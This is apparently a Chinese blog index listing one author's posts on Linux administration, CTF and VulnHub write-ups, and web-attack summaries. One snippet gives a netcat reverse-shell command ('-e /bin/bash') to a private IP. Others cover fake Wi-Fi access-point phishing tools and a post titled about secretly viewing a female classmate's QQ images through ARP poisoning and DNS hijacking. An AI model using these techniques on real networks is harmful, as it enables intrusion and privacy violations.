- 博客(52)
- 资源 (3)
- 收藏
- 关注
RSS订阅原创 arch linux 安装deb安装包
使用debtap将Deb包解压并打包成archliux package安装 debtapyay -S debtap更新debtap数据库sudo debtap -u 使用debtap转换deb包debtap xxx.deb安装sudo pacman -U xxx.pkg
2021-06-26 18:35:16
11244
2
原创 记录一次manjaro系统grub修复
前在最近的折腾中,主系统引导挂了,简单记录一下,以供日后参考使用了manjaro usb启动命令行挂载系统分区和efi分区mount /dev/nv2 /mnt #将系统分区挂载到mnt上mount /dev/nv1 /mnt/boot/efi # 将efi分区挂载到mnt/boot/efichroot 进入 系统manjaro-chroot /mnt #进入系统sh$重新安装grubgrub-install --target=x86_64-efi /dev/nv1
2021-06-25 19:49:28
1851
原创 记录一次系统迁移&恢复(manjaro+timeshift)
前本来打算重新装个双系统,结果手快了,2块硬盘都吃掉了,(win安装程序居然没有最后警告一下),主系统是manjaro,一直有timeshift备份,不过都是当作快照使用,还好存了一个在云盘里面,可以拿来直接恢复.恢复首先常规步骤,重新安装manjaro系统,需要注意的是,为了保险起见,这里的用户名,密码,Root密码,主机名,我都设置和原来的一样,这一步完成后得到的就是一个崭新的操作系统然后将内核切换为你的timeshift备份文件一样,否则会恢复后会无法启动系统.将你的备份文件下
2021-06-21 14:09:39
3725
原创 L2TP iptables nat设置
问题描述一番周折之后设备都可以接入l2tp中,也可以正常访问外网,但是设备之间却无法ping通,发现l2tp安装脚本默认的nat规则有点问题,修改后即可解决A首先将原来的规则删除然后再
2021-05-22 12:56:30
904
原创 VulnHub系列之ch4inrulz 渗透测试
CH4INRULZ_v1.0.1靶机地址:https://www.vulnhub.com/entry/ch4inrulz-101,247/弗兰克有一个小网站,他是一个聪明的开发人员,具有正常的安全背景,他总是喜欢遵循模式,你的目标是发现任何严重的漏洞并获得对系统的访问权限,然后你需要获得 root 访问权限才能捕获。根标志。这台机器是为 Jordan's Top hacker 2018 CTF 制作的
2021-04-26 19:28:55
375
原创 VulnHub系列之Lampiao渗透测试
Lampiao靶机下载:https://www.vulnhub.com/entry/lampiao-1,249/您想继续在自己的实验室中进行黑客攻击吗?试试这个全新的易受攻击的机器!“兰皮奥 1”。
2021-04-26 15:53:16
406
原创 VulnHub系列之Jarbas渗透测试
jarbas虚拟机:https://www.vulnhub.com/entry/jarbas-1,232/如果你想继续你的黑客研究,请试试这台机器!Jarbas 1.0 – 向 90 年代末怀旧的巴西搜索引擎致敬。目标:获取root shell!
2021-04-26 10:29:12
1073
原创 PHP无参函数
eg<?phpif(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) { eval($_GET['code']);} else { show_source(__FILE__);}
2021-04-18 15:18:21
629
原创 利用Mysql导入恢复读取本地任意文件
前最近刷到一个题目,挺有意思的,以前没有见过,记录一下题目直接弱密码杀进后台,这个题目有很多文件上传点,但都使用了白名单,截断文件名也失败了.最后发现一个页面提供了恢复备份数据表的功能.这里就想到能不能去做一个读取本地flag文件然后写入到数据表中,再下载新的数据表这样就可以看到flag文件了.去搜了一下,想要读取本地文件有3种方法.insert into user('flag_value') values (load_file('/1.txt')) load data infile '
2021-04-11 12:45:31
130
原创 Session 会话劫持和cookie窃取
会话劫持会话劫持(Session hijacking),这是一种通过获取用户Session ID后,使用该Session ID登录目标账号的攻击方法,此时攻击者实际上是使用了目标账户的有效Session。会话劫持的第一步是取得一个合法的会话标识来伪装成合法用户思路攻击者不获取用户的cookie和session,而是想办法让用户在不知情的情况自己去踩坑。比如CSRF跨站脚本让已经被服务器验证通过的用户来帮攻击者完成危险操作。1.攻击者构造特殊的界面,请求修改密码。//evil.html<
2021-04-08 17:45:35
899
原创 NC获取系统权限
Netcat利用nc工具可以使命令注入攻击变得更加六匹命令注入思路总结反向 reverse shell反向shell是从目标主机发起到处于监听状态的攻击机器的shell连接方式,又叫被动连接nc实现shell反弹step1-攻击机开始监听本地端口 nc -lvp 4444step2-目标机向攻击机的端口提供shell,实现权限转移nc 192.168.43.175 4444 -e /bin/bash step3-当在攻击端看到收到连接后就说明已经得到了目标机器的部分shell了
2021-04-02 11:35:51
669
原创 PHP反序列化
序列化以PHP语言为例子,在写程序尤其是写网站的时候,经常会构造类,并且有时候会将实例化的类作为变量进行传输。序列化就是在此为了减少传输内容的大小孕育而生的一种压缩方法。我们知道一个PHP类都含有几个特定的元素: 类属性、类常量、类方法。每一个类至少都含有以上三个元素,而这三个元素也可以组成最基本的类。那么按照特定的格式将这三个元素表达出来就可以将一个完整的类表示出来并传递。序列化就是将一个类压缩成一个字符串的方法<?phpclass TEST{ public $a="public"; pr
2021-03-31 19:18:06
883
2
原创 PHP代码审计总结
AUDIT 启一切的用户输入都是有害的,危险的数据进入了危险的函数便产生了漏洞。从这2句话,不难看出审计的关键在于用户输入和函数因此 大概分出2类审计方法。跟踪用户的输入数据,检查代码运行的逻辑漏洞。检索危险的函数,分析其参数是否被用户输入控制,如果可以,就很有可能有漏洞。网站功能分析注册功能我们要根据需求列出服务器端需要接收的数据,假设有用户名、密码、邮箱、手机号等注销功能根据需要我们要回收令牌资源,保存用户操作以及状态(操作日志、当前用户等级等)。发表评论功能要判断
2021-03-29 19:16:52
426
原创 Linux终端‘快捷方式’
简单记录对于有些工具需要一步一步cd过去之后再去执行文件,比较麻烦。可以在 /usr/bin文件夹下面添加一个’快捷方式‘,直接在终端输入快捷方式文件的文件名就可以之间运行那个文件。cd /usr/bingedit burpsuite写入以下内容java -cp . -jar /home/linc/Documents/data/tool/burpsuite1.6pro/BurpLoader.jar#添加执行权限chmod +x burpsuite或者cd /usr/bin
2021-03-18 16:21:07
153
原创 文件上传思路总结
思路总结当遇到js前端脚本限制上传文件类型使用浏览器插件。删除检测文件后缀的JS代码,然后上传webshell在前端js判断函数中加上可以上传php文件,或者直接删去这一函数首先把webshell的后缀改成允许上传的.jpg|.png|.gif,绕过JS检测。再抓包把后缀名改成.php,即可上传webshell当服务器检测上传文件的MIME类型即媒体类型时当上传PHP文件时,抓包发现Content-Type字段是application/x-php这时只要修改为其他值即可后端
2021-03-18 10:56:59
740
1
原创 AWD平台搭建与使用入门
简单介绍平台搭建因为平台已经做的比较集成化,所以安装还是很简单的。首先需要下载赛题项目git clone https://github.com/zhl2008/awd-platform#这一条命令可以将文件下载到当前工作目录,文件名为awd-platform因为项目地址是在github上面,所以对某些国内用户可能会有一些网络问题,这里博主搬运了一下,上传到csdn上面了。(点击前往)然后需要下载dockersudo apt install docker.io这里如果没有更换ap
2021-03-16 16:20:19
9809
11
原创 XSS总结
Xss总结思路总结当服务器未对输入值做任何过滤原样echo当页面保留输入值时当遇到对payload实体转换时当服务器对payload进行尖括号替换时当服务器对payload进行关键字替换时script,on事件过滤src data href 过滤payload必须包含关键词对空格和斜杠替换时当输入字段属性被隐藏时当payload不从浏览器获取时refere 字段--$_SERVER['HTTP_REFERER'];user agent字段--$_SERVER['HTTP_USER_AGENT'];html文
2021-03-12 16:26:37
228
原创 Sql基础注入总结
思路总结一般来说首先判断注入点是字符型或者时数值型字符型首先尝试参数带‘ “ ( %等特殊字符,而得到报错信息则很有可能是字符型
2021-03-12 16:22:51
183
原创 2017第二届广东省强网杯线上赛Random
题目给出2个文件,一个pyo为文件和一个enc。打开pyo文件发现是一个二进制文件不太清除pyo是什么,去搜索一下,发现如下内容py:源码文件,由 Python 程序解释。pyc:源码经编译后生成的二进制字节码(Bytecode)文件。pyo:优化编译后的程序,也是二进制字节码文件。pyo文件阅读不来,而pyo又由py文件编译而来推测需要反编译得到py文件,搜索如何反编译pyo文件。pip install uncompyle查看得到的py文件,发现还是不能完全‘’可读搜索了.
2021-02-24 15:31:10
222
原创 WindowsServer2008的服务搭建与安全加固
WInServer2008的IIS,DNS,DHCP,FTP常用服务的详细搭建过程和安全加固
2021-02-17 20:23:54
761
2
原创 简记RTL88x2BU-Linux无线网卡AP驱动安装(内核更新)
当内核更新后发现设备无法使用,重新编译驱动发现报错error: redefinition of ‘struct sha256_state’
2020-12-23 17:32:39
4847
原创 wifiphisher使用无法启动DHCP解决+自定义登陆界面
当wifiphisher建立一个AP时,目标机器一直无法得到一个IP连接到AP这是因为wifiphisher使用的端口被系统占用了,需要去把系统的服务停掉sudo systemctl disable systemd-resolved.servicesudo systemctl stop systemd-resolved重新发动攻击目标机就可以正常连接了!!!!攻击完后攻击机会上不了网,需要把刚刚关掉的服务打开!!!!sudo systemctl enable systemd-resolve
2020-10-23 18:49:01
1390
2
原创 fluxion 无法连接虚假AP热点,DHCP服务启动失败
记录一个使用fluxion时,无法连接至虚假AP的DHCP问题编辑/fluxion/attacks/Captive Portal/attack.shgedit fluxion/attacks/Captive\ Portal/attack.sh在1468行在dhcpd 的前面加上sudo2. 此时如果还是无法正常启动dhcp服务,那么需要停止apparmor守护进程sudo /etc/init.d/apparmor stop然后在使用root权限编辑/etc/apparmor.d/us
2020-10-23 13:39:13
4286
8
原创 偷偷远程窥视同班女孩的qq图片(arp中毒+dns劫持)
注:以下行为皆是在自己的机器上实现的,请勿攻击未授权的目标,这侵犯了人们的隐私权前言:首先来介绍一下我们要用到的工具Ettercap从英文翻译而来-Ettercap是在LAN人在这方面的中间人攻击自由和开放源码网络安全工具。它可用于计算机网络协议分析和安全审核。它可以在各种类Unix操作系统(包括Linux,Mac OS X,BSD和Solaris)以及Microsoft Windows上运行。它能够拦截网段上的流量,捕获密码并针对多种常见协议进行主动窃听。Driftnet监视网络流量,抓取网络
2020-10-14 20:55:22
881
1
原创 python3scapy库函数使用,发送数据包
scapy函数交互式网络分组处理模块。可以用于构造或者解码大量的数据包协议,发送,捕获数据包并匹配请求和回复。导入scapy库from scapy.all import *构造数据包简单构造直接构造默认数据包 >>> a=IP() #不带参数表示构造默认的IP数据包 >>> a.show() #查看数据包a的相关信息 ###[ IP ]### version = 4 ihl = None tos = 0x0
2020-09-27 14:16:08
2952
原创 python实现word转anki制卡格式
目录阿超级长的吐槽前言目标简述第一歩:将段落格式转换为英文和汉字分开并且以tab制表符分开第二步:使用有道翻译url带入短语参数获取例句信息第三步:导入anki超级长的吐槽前言最近需要背一下短语,没有在各大背单词app上面找到我需要背的词书.没办法了,去网上找到了某垃圾教育网站的word,…,这个格式,简直惨不忍睹,???那个憨憨做的文档??分栏不会吗居然手打空格来分栏,我佛了np,来感受一下好吧,我承认光是把格式改成一条词汇一行我就花了半个小时…目标简述首先需要将上一张图片的格式转换为英文和
2020-08-21 11:25:20
2617
原创 python实现自动每日数据填报和结果短信通知
实在是不想每天都去填报数据,,经常搞完,还要算考勤,,,,文章目录思路第一步:将url和payload确认下来第二步:进行登陆操作第三步:发送填报数据第四步:检测是否已经填写数据第五步:twilio短信通知组合服务器自动执行尾巴思路其实还是比较简单的,主要先利用requests模块进行登陆,然后post数据填报,在读取历史数据有没有今天的记录实现一个校验,最后再利用twilio模块将填报的结果短信发送到我自己的手机上。脚本完成后放到服务器上面设置定时每天执行就好了。第一步:将url和payload确
2020-06-12 23:49:54
1907
原创 新知识!!data协议----网络安全实验室脚本关
脚本关1.小明这次哭了,key又找不到了!!打开题目,点击链接,发现网页显示 跳转 到这里去找key进入下一个网站后又提示说key在来的地方猜测key应该藏在第一个链接的response里面,开始抓包,再次点击第一个链接,porxy模块抓取到数据后ctrl+r 发送到repeater模块。点击send发送,观察得到的response,发现key2.小明要参加一个高技能比赛打开题目提示说要2秒内完成答案的提交,首先随便输入一个答案,抓包,查看数据,发现post的一个 v的参
2020-06-10 14:02:45
1717
原创 使用PHP创建一个在线文件库(3)文件上传
项目目标实现具有上传,查看,删除。下载功能的在线文件库。文章目录项目目标1.文件上传设置2.编写文件上传表单客户端3.编写PHP上传处理脚本1.文件上传设置要保证上传成功,首先要进行正确的设置,包括设置表单字符编码方式,客户端文件大小,php.ini中的有关文件上传设置。1.设置表单字符编码方式在文件上传客户端表单后,应将表单编程方式设置为multipart/form-data<form enctype="multipart/form-data" ...>2.设置客户端文件大小
2020-05-26 12:46:52
239
balenaEtcher-Portable-1.5.80.exe
2020-04-25
xfce4-master.zip
2020-03-24
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人